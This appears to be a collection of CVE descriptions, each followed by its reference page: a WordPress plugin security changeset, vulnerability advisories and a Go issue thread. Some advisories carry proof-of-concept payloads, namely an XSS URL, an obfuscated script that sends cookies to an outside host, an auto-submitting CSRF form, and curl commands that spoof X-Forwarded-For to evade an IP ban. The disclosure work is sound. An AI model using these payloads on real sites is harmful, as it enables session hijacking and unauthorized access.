The WP Live Chat Support plugin before 8.0.06 for WordPress has stored XSS via the Name field.

CVE-2018-9864

admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.php.

Timestamp:

01/22/2018 07:29:38 PM (5 years ago)

janhenckens

Message:

Security update  

Location:

wp-splashing-images/trunk

Files:

  

*   README.txt (2 diffs)
*   admin/partials/wp-splashing-admin-main.php (1 diff)
*   admin/partials/wp-splashing-admin-sidebar.php (1 diff)
*   wp-splashing-images.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **wp-splashing-images/trunk/README.txt**
    
    r1799926
    
    r1807349
    
     
    
    5
    
    5
    
    Requires at least: 4.0
    
    6
    
    6
    
    Tested up to: 4.9.1
    
    7
    
     
    
    Stable tag: 2.1.0
    
     
    
    7
    
    Stable tag: 2.1.1
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    33
    
    33
    
    \== Changelog ==
    
    34
    
    34
    
     
    
    35
    
    \= 2.1.1 =
    
     
    
    36
    
    \* Fixed 2 security issues
    
     
    
    37
    
    35
    
    38
    
    \= 2.1 =
    
    36
    
    39
    
    \* Updated unsplash library and use the new download function
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-main.php**
    
    r1799926
    
    r1807349
    
     
    
    20
    
    20
    
        </h1>
    
    21
    
    21
    
            <?php if($\_GET\['session'\]) {
    
    22
    
     
    
    23
    
     
    
                $data = unserialize(base64\_decode($\_GET\['session'\]));
    
     
    
    22
    
                $data = unserialize(base64\_decode($\_GET\['session'\]), \['allowed\_classes' => false\]);
    
    24
    
    23
    
                $this->unsplash->saveTokens($data\['token'\]);
    
    25
    
    24
    
                $user = $this->unsplash->getUser(); ?>
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-sidebar.php**
    
    r1675965
    
    r1807349
    
     
    
    7
    
    7
    
                    <form id="splashing-search" method="get" action="<?php echo esc\_url(admin\_url('admin-post.php')); ?>">
    
    8
    
    8
    
                        <label class="screen-reader-text" for="post-search-input">Search Posts:</label>
    
    9
    
     
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo $\_GET\['search'\]; ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
     
    
    9
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo sanitize\_title\_for\_query($\_GET\['search'\]); ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
    10
    
    10
    
                        <input type="hidden" name="action" value="wp\_splashing\_search">
    
    11
    
    11
    
                        <input type="hidden" name="paged" value="1">
    
*   **wp-splashing-images/trunk/wp-splashing-images.php**
    
    r1799926
    
    r1807349
    
     
    
    17
    
    17
    
     \* Plugin URI:        http://studioespresso.co
    
    18
    
    18
    
     \* Description:       Unsplash.com), right in your dashboard. Add photos with one click and use them in your content right away.
    
    19
    
     
    
     \* Version:           2.1.0
    
     
    
    19
    
     \* Version:           2.1.1
    
    20
    
    20
    
     \* Author:            Studio Espresso
    
    21
    
    21
    
     \* Author URI:        http://studioespresso.co
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2018-6195: Changeset 1807349 for wp-splashing-images – WordPress Plugin Repository

Cross-site scripting vulnerability in WP Live Chat Support prior to version 7.0.07 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

**Changeset view not shown**, since the total size (8.7 MB) exceeds 4.0 MB

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2017-2187: Changeset 1658232 – WordPress Plugin Repository

Cross-site scripting vulnerability in YOP Poll versions prior to 5.8.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

Published:2017/03/23  Last Updated:2017/03/23

**Overview**

The WordPress plugin "YOP Poll" contains a cross-site scripting vulnerability.

**Products Affected**

*   YOP Poll versions prior to 5.8.1

**Description**

The WordPress plugin "YOP Poll" contains a stored cross-site scripting (CWE-79) vulnerability.

**Impact**

An arbitrary script may be executed on the web browser of a user accessing the poll generated by the application.

**Solution**

**Update the plugin**  
Update the plugin according to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

CVSS v3 CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Attack Vector(AV)

Physical (P)

Local (L)

Adjacent (A)

Network (N)

Attack Complexity(AC)

High (H)

Low (L)

Privileges Required(PR)

High (H)

Low (L)

None (N)

User Interaction(UI)

Required (R)

None (N)

Scope(S)

Unchanged (U)

Changed (C)

Confidentiality Impact(C)

None (N)

Low (L)

High (H)

Integrity Impact(I)

None (N)

Low (L)

High (H)

Availability Impact(A)

None (N)

Low (L)

High (H)

CVSS v2 AV:N/AC:L/Au:S/C:N/I:P/A:N

Access Vector(AV)

Local (L)

Adjacent Network (A)

Network (N)

Access Complexity(AC)

High (H)

Medium (M)

Low (L)

Authentication(Au)

Multiple (M)

Single (S)

None (N)

Confidentiality Impact(C)

None (N)

Partial (P)

Complete (C)

Integrity Impact(I)

None (N)

Partial (P)

Complete (C)

Availability Impact(A)

None (N)

Partial (P)

Complete (C)

**Credit**

Sho Ueshima, Takashi Honda, Tsuyoshi Ogawa and Minaho Umehara of SIE Co.,Ltd. reported this vulnerability to IPA.  
JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.

**Other Information**

CVE-2017-2127: WordPress plugin "YOP Poll" vulnerable to cross-site scripting

Untrusted search path vulnerability in Go before 1.5.4 and 1.6.x before 1.6.1 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, related to use of the LoadLibrary function.

Here is one of many programs I use on my PC.

    C:\Program Files (x86)\Git\bin>objdump -p git.exe | grep Load
    LoaderFlags             00000000
    Entry a 00000000 00000000 Load Configuration Directory
            19cc7c    524  LoadLibraryA     7dd7499f
    
    C:\Program Files (x86)\Git\bin>dir *.dll
     Volume in drive C has no label.
     Volume Serial Number is F0C8-6DFE
    
     Directory of C:\Program Files (x86)\Git\bin
    
    07/12/2014  06:01 PM         1,154,665 libapr-0-0.dll
    07/12/2014  06:01 PM           992,438 libaprutil-0-0.dll
    07/12/2014  06:01 PM         1,724,229 libcrypto.dll
    07/12/2014  06:01 PM           360,448 libcurl.dll
    07/12/2014  06:01 PM           958,945 libexpat-0.dll
    07/12/2014  06:01 PM           443,550 libgsasl-7.dll
    07/12/2014  06:01 PM         1,241,889 libiconv-2.dll
    07/12/2014  06:01 PM           293,380 libintl-8.dll
    07/12/2014  06:01 PM         2,076,008 libneon-25.dll
    07/12/2014  06:01 PM         4,884,531 libpoppler-7.dll
    07/12/2014  06:01 PM           391,048 libssl.dll
    07/12/2014  06:01 PM         1,218,359 libsvn_client-1-0.dll
    07/12/2014  06:01 PM           851,272 libsvn_delta-1-0.dll
    07/12/2014  06:01 PM           798,881 libsvn_diff-1-0.dll
    07/12/2014  06:01 PM           792,459 libsvn_fs-1-0.dll
    07/12/2014  06:01 PM         1,028,321 libsvn_fs_fs-1-0.dll
    07/12/2014  06:01 PM           759,216 libsvn_ra-1-0.dll
    07/12/2014  06:01 PM         1,017,784 libsvn_ra_dav-1-0.dll
    07/12/2014  06:01 PM           800,669 libsvn_ra_local-1-0.dll
    07/12/2014  06:01 PM           930,046 libsvn_ra_svn-1-0.dll
    07/12/2014  06:01 PM         1,055,893 libsvn_repos-1-0.dll
    07/12/2014  06:01 PM         1,248,729 libsvn_subr-1-0.dll
    07/12/2014  06:01 PM           864,473 libsvn_swig_perl-1-0.dll
    07/12/2014  06:01 PM         1,253,965 libsvn_wc-1-0.dll
    07/12/2014  06:01 PM           812,063 libW11.dll
    07/12/2014  06:01 PM           194,947 libz.dll
    07/12/2014  06:01 PM           777,544 msys-1.0.dll
    07/12/2014  06:01 PM         1,282,560 msys-crypto-1.0.0.dll
    07/12/2014  06:01 PM            19,968 msys-minires.dll
    07/12/2014  06:01 PM           939,520 msys-perl5_8.dll
    07/12/2014  06:01 PM            82,852 msys-regex-1.dll
    07/12/2014  06:01 PM           328,192 msys-ssl-1.0.0.dll
    07/12/2014  06:01 PM            91,792 msys-z.dll
    07/12/2014  06:01 PM            52,064 msysltdl-3.dll
    07/12/2014  06:01 PM            65,124 pthreadGC2.dll
    07/12/2014  06:01 PM         1,152,701 tcl85.dll
    07/12/2014  06:01 PM            30,023 tclpip85.dll
    07/12/2014  06:01 PM         1,410,875 tk85.dll
                  38 File(s)     34,381,423 bytes
                   0 Dir(s)  94,420,832,256 bytes free
    
    C:\Program Files (x86)\Git\bin>
    

Just to demonstrate that behaviour you're about to break is actually used by some products.

> See the top comment in this bug: "2) Add a LoadLibraryEx to x/sys/win so that users can still get at the old behavior if they want it (by appropriate passing of flags)."
> 
> (A flags of 0 would mean the current behavior)

But that will still break my existing code. I don't personally have problem like described in https://textplain.wordpress.com/2015/12/18/dll-hijacking-just-wont-die/. Why should I suffer? Why cannot we do what I suggested above? What is the downside?

Alex

CVE-2016-3958: syscall: guard against Windows DLL preloading attacks   · Issue #14959 · golang/go

The phar_make_dirstream function in ext/phar/dirstream.c in PHP before 5.6.18 and 7.x before 7.0.3 mishandles zero-size ././@LongLink files, which allows remote attackers to cause a denial of service (uninitialized pointer dereference) or possibly have unspecified other impact via a crafted TAR archive.

CVE-2016-4343: PHP: PHP 7 ChangeLog

Cross-site scripting (XSS) vulnerability in the Blubrry PowerPress Podcasting plugin before 6.0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cat parameter in a powerpress-editcategoryfeed action in the powerpressadmin_categoryfeeds.php page to wp-admin/admin.php.

**Full Disclosure mailing list archives**

_From_: Onur Yilmaz <onur () netsparker com>  
_Date_: Thu, 29 Jan 2015 17:19:29 +0200  

Information
------------
Advisory by Netsparker
Name: XSS Vulnerability in Blubrry PowerPress
Affected Software : Blubrry PowerPress
Affected Versions: 6.0 and possibly below
Vendor Homepage : https://wordpress.org/plugins/powerpress/
Vulnerability Type : Cross-site Scripting
Severity : Important
CVE-ID: CVE-2015-1385
Netsparker Advisory Reference : NS-15-001

Description
-----------
By exploiting a Cross-site scripting vulnerability the attacker can
hijack a logged in user?s session. This means that the malicious
hacker can change the logged in user?s password and invalidate the
session of the victim while the hacker maintains access. As seen from
the XSS example in this article, if a web application is vulnerable to
cross-site scripting and the administrator?s session is hijacked, the
malicious hacker exploiting the vulnerability will have full admin
privileges on that web application.

Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner.
--------------------

Proof of Concept URLs for XSS in Blubrry PowerPress WordPress plugin:

/wp-admin/admin.php?page=powerpress/powerpressadmin\_categoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--></style></scRipt><scRipt>alert(0x014068)</scRipt>

For more information on cross-site scripting vulnerabilities read the
following article on Cross-site Scripting (XSS) -
https://www.netsparker.com/web-vulnerability-scanner/vulnerability-security-checks-index/crosssite-scripting-xss/

Advisory Timeline
--------------------
22/01/2015 - First Contact
26/01/2015 - Vulnerability fixed
29/01/2015 - Advisory released

Solution
--------------------
Download version 6.0.1 which includes fix for this vulnerability.

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing
Netsparker Web Application Security Scanner -
https://www.netsparker.com/web-vulnerability-scanner/

About Netsparker
--------------------
Netsparker finds and reports security issues and vulnerabilities such
as SQL Injection and Cross-site Scripting (XSS) in all websites and
web applications regardless of the platform and the technology they
are built on. Netsparker's unique detection and exploitation
techniques allows it to be dead accurate in reporting hence it's the
first and the only False Positive Free web application security
scanner. For more information visit our website on
https://www.netsparker.com

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Blubrry PowerPress Security Advisory - XSS Vulnerability - CVE-2015-1385** _Onur Yilmaz (Jan 29)_

CVE-2015-1385: Full Disclosure: Blubrry PowerPress Security Advisory - XSS Vulnerability

Cross-site request forgery (CSRF) vulnerability in the CreativeMinds CM Downloads Manager plugin before 2.0.7 for WordPress allows remote attackers to hijack the authentication of administrators for requests that conduct cross-site scripting (XSS) attacks via the addons_title parameter in the CMDM_admin_settings page to wp-admin/admin.php.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1Product: WordPress plugin cm-download-managerPlugin page: https://wordpress.org/plugins/cm-download-manager/Vendor: CreativeMindsSolutions http://cminds.com/Vulnerability Type: CWE-79: Cross-site scriptingVulnerable Versions: 2.0.6 and belowFixed Version: 2.0.7Solution Status: Fixed by VendorVendor Notification: 2014-11-27Public Disclosure: 2014-12-02CVE Reference: N/A. Only assigned for CSRFCriticality: LowVulnerability details:CM Download Manager plugin for WordPress contains a flaw that allows a storedcross-site scripting (XSS) attack. This flaw exists because the/wp-admin/admin.php script does not validate input to the 'addons_title' POSTparameter before returning it to users. This allows an authenticated remoteattacker to create a specially crafted request that would execute arbitraryscript code in a user's browser session within the trust relationship betweentheir browser and the server.Root cause:The software incorrectly neutralizes user-controllable input before it is placedin output that is used as a web page that is served to authenticated users.Proof-of-concept:Insert following code to CM Downloads -> Settings -> "Downloads listing title"field with CSRF attack.<script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110,101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116,116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107,105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109,101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105,112, 116, 62);document.write(foo);</script>- ---------------Product: WordPress plugin cm-download-managerPlugin page: https://wordpress.org/plugins/cm-download-manager/Vendor: CreativeMindsSolutions http://cminds.com/Vulnerability Type: CWE-352: Cross-Site Request ForgeryVulnerable Versions: 2.0.6 and belowFixed Version: 2.0.7Solution Status: Fixed by VendorVendor Notification: 2014-11-27Public Disclosure: 2014-12-02CVE Reference: CVE-2014-9129Criticality: LowVulnerability details:CM Download Manager plugin for WordPress contains a flaw on theCMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do notrequire multiple steps, explicit confirmation, or a unique token when performingsensitive actions. By tricking authenticated user into following a speciallycrafted link, a context-dependent attacker can perform a CSRF attack causing thevictim to insert and execute arbitrary script code.Root cause:The web application does not sufficiently verify whether a well-formed, valid,consistent request was intentionally provided by the user who submitted therequest.Proof-of-concept:<html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3><form id="f1" method="POST"action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings"><table><input type="text" name="addons_title" value="XSS"></table></form><script type="text/javascript">document.getElementById("f1").submit();</script></body></html>Notes:Other pages and/or parameters are also possibly insecure (not tested). Suggestedto do a proper security audit for their software. Vendor did not mentionsecurity fix or CVE in ChangeLog even it was discussed several times. Referencesbelow.Cross-site scripting:    http://cwe.mitre.org/data/definitions/79.html    https://scapsync.com/cwe/CWE-79    https://en.wikipedia.org/wiki/Cross-site_scriptingCross-Site Request Forgery:    http://cwe.mitre.org/data/definitions/352.html    https://scapsync.com/cwe/CWE-352     https://en.wikipedia.org/wiki/Cross-site_request_forgery- ---Henri Salo-----BEGIN PGP SIGNATURE-----Version: GnuPG v1.4.12 (GNU/Linux)iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT=bUVi-----END PGP SIGNATURE-----

CVE-2014-9129: WordPress CM Download Manager 2.0.6 XSS

WP-Ban plugin before 1.6.4 for WordPress, when running in certain configurations, allows remote attackers to bypass the IP blacklist via a crafted X-Forwarded-For header.

**Full Disclosure mailing list archives**

_From_: dxw Security <security () dxw com>  
_Date_: Wed, 17 Sep 2014 13:59:56 +0000  

Details
================
Software: WP-Ban
Version: 1.62
Homepage: http://wordpress.org/plugins/wp-ban/
Advisory report: 
https://security.dxw.com/advisories/vulnerability-in-wp-ban-allows-visitors-to-bypass-the-ip-blacklist-in-some-configurations/
CVE: CVE-2014-6230
CVSS: 5 (Medium; AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description
================
Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations

Vulnerability
================
This plugin allows blacklisting users based on their IP address, however it takes the IP address from the 
X-Forwarded-For header if available.
Not all Web server configurations will strip or replace X-Forwarded-For headers – in which case the IP ban can be 
bypassed by sending this header. This plugin therefore only works in certain configurations, but does not warn admins 
of this fact.

Proof of concept
================

Visit http://localhost/wp-admin/admin.php?page=wp-ban/ban-options.php
Set “Banned IPs” to “127.0.0.1″
Execute “curl http://localhost/\\"; and see the “You Are Banned” message
Execute “curl http://localhost/ -H \\'X-Forwarded-For: 999.999.999.999\\'\\" and see that it displays the page

Note that this will not work if your Web server sets or strips X-Forwarded-For headers.
(To remove the IP blacklist run this SQL: “delete from wp\_options where option\_name=\\'banned\_ips\\';\\")

Mitigations
================
Upgrade to version 1.6.4 or later.
If a reverse-proxy is used, check the “I am using a reverse proxy” box in the plugin settings, and ensure that 
X-Forwarded-For headers are being set even if the request already contains an X-Forwarded-For header.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: 
https://security.dxw.com/disclosure/

Please contact us on security () dxw com to acknowledge this report if you received it via a third party (for example, 
plugins () wordpress org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2014-08-27: Discovered
2014-09-04: Reported to vendor by email
2014-09-04: Requested CVE
2014-09-04: Vendor responded
2014-09-17: Vendor reported a fixed version released
2014-09-17: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
          


\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations (WordPress plugin)** _dxw Security (Sep 17)_

CVE-2014-6230: Vulnerability in WP-Ban allows visitors to bypass the IP blacklist in some configurations (WordPress plugin)

Multiple cross-site scripting (XSS) vulnerabilities in the WP Google Maps plugin before 6.0.27 for WordPress allow remote attackers to inject arbitrary web script or HTML via the poly_id parameter in an (1) edit_poly, (2) edit_polyline, or (3) edit_marker action in the wp-google-maps-menu page to wp-admin/admin.php.

Tag

#wordpress